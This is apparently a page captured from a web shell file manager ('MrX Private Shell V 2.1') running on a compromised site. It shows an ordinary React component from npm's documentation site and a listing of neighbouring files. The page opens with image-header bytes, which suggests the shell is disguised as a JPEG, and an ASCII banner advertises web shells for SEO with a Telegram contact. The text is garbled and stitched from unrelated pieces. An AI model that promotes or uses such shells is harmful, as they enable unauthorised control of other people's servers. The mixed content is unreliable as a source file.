����JFIF���������
__ __ __ __ _____ _ _ _____ _ _ _ | \/ | \ \ / / | __ \ (_) | | / ____| | | | | | \ / |_ __\ V / | |__) | __ ___ ____ _| |_ ___ | (___ | |__ ___| | | | |\/| | '__|> < | ___/ '__| \ \ / / _` | __/ _ \ \___ \| '_ \ / _ \ | | | | | | |_ / . \ | | | | | |\ V / (_| | || __/ ____) | | | | __/ | | |_| |_|_(_)_/ \_\ |_| |_| |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1 if you need WebShell for Seo everyday contact me on Telegram Telegram Address : @jackleetFor_More_Tools:
import React from 'react'
import styled from 'styled-components'
import FeatureCard from './FeatureCard'
import { FeatureLink } from '../links'
import { Flex } from 'rebass'
import rectangles from '../../images/background-rectangles.svg'
import terminalIcon from '../../images/terminal-icon.svg'
import networkIcon from '../../images/network-icon.svg'
import npmIcon from '../../images/npm-icon.png'
import managerIcon from '../../images/manager-icon.svg'
const ContainerInner = styled(Flex)`
background: linear-gradient(84deg, #fb881799, #ff4b0199, #c1212799, #e02aff99);
`
const Container = styled.div`
background: top / cover no-repeat url(${rectangles});
`
const ContentWrapper = styled(Flex)`
max-width: 640px;
`
const featureTexts = {
textOne: 'Download, install, and configure.',
textTwo: 'All available npm commands.',
textThree: 'How npm things work.',
textFour: 'Publish your own public or private packages to the registry with a free or paid account on npmjs.com from npm, Inc.'
}
const featureTitles = {
titleOne: 'Getting Started',
titleTwo: 'Command Reference',
titleThree: 'Using npm',
titleFour: 'Publishing'
}
const aStyle = {
color: '#231f20',
textDecoration: 'none'
}
const productsLink = `https://www.npmjs.com/products`
const Features = () => {
return (
<Container>
<ContainerInner>
<ContentWrapper m='auto' py={5} flexDirection='column'>
<FeatureLink to={'/configuring-npm/install'}>
<FeatureCard
icon={terminalIcon}
title={featureTitles.titleOne}
text={featureTexts.textOne}
/>
</FeatureLink>
<FeatureLink to={'/cli-commands/npm'}>
<FeatureCard
icon={managerIcon}
title={featureTitles.titleTwo}
text={featureTexts.textTwo}
/>
</FeatureLink>
<FeatureLink to={'/using-npm/developers'}>
<FeatureCard
icon={networkIcon}
title={featureTitles.titleThree}
text={featureTexts.textThree}
/>
</FeatureLink>
<a href={productsLink} style={aStyle} target={'_blank'}>
<FeatureCard
icon={npmIcon}
title={featureTitles.titleFour}
text={featureTexts.textFour}
/>
</a>
</ContentWrapper>
</ContainerInner>
</Container>
)
}
export default Features
| Name | Type | Size | Permission | Actions |
|---|---|---|---|---|
| DarkBlock.js | File | 1.07 KB | 0644 |
|
| FeatureCard.js | File | 861 B | 0644 |
|
| Features.js | File | 2.41 KB | 0644 |
|
| Footer.js | File | 672 B | 0644 |
|
| Terminal.js | File | 2.74 KB | 0644 |
|
| Windows.js | File | 1.55 KB | 0644 |
|
| cubes.js | File | 2.29 KB | 0644 |
|
| hero.js | File | 616 B | 0644 |
|